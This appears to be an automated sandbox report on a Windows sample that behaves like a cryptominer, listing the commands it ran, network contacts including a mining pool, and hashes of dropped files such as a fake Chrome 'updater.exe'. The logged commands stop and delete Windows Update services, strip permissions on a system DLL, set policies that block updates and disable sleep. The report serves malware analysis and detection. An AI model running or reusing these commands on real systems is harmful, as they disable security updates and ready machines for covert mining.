"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\sc.exe

sc stop UsoSvc

C:\Windows\system32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\system32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\dialer.exe

C:\Windows\System32\dialer.exe "uscznjtdlrpzim"

C:\Windows\system32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\system32\sc.exe

sc stop wuauserv

C:\Windows\system32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\dialer.exe

C:\Windows\System32\dialer.exe qogpttybmmmxi0

C:\Windows\system32\sc.exe

sc stop bits

C:\Windows\system32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

sc stop dosvc

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\WaaSMedicSvc.dll

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE

C:\Windows\system32\backgroundTaskHost.exe

"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\backgroundTaskHost.exe

"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca

C:\Windows\system32\BackgroundTransferHost.exe

"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 75.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.111.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:443 pool.hashvault.pro tcp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ynlju123.dqv.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d28a889fd956d5cb3accfbaf1143eb6f
SHA1 157ba54b365341f8ff06707d996b3635da8446f7
SHA256 21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45
SHA512 0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

C:\Users\Admin\Google\Chrome\updater.exe

MD5 40eeb7e6dc706f7e0eac78cc85213220
SHA1 28b55166002c4ba1c9af0ec4fd9f98b591d6e498
SHA256 9709d21f40cd1def7d6bb809d5e11fa948ec7290e201ae2b2a62e1bd17368548
SHA512 219713374a9bbaf254fd88f1834ca82fec95228b8de3890a466079866026491381caacd4309a9b7ab278cd5e92097fdee5105bbdbddc6c0b6743a6f871f6060f

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 b8d47e2c1f3059153b45a40c135b482b
SHA1 92e85cdfc26762ff1594584ad65637fa4a2da06d
SHA256 9b1ccb253d184b7486940542ebfc7bd79fe2c22f7737cf7ef76378b12ba2beb2
SHA512 a3a4c97e671d59b5335b466066e297085bef136c909e32a29f226546a03849722704127afcd15f0ed2301411552810fc8c6e0f76c2295d1c8da5fe55a7466797
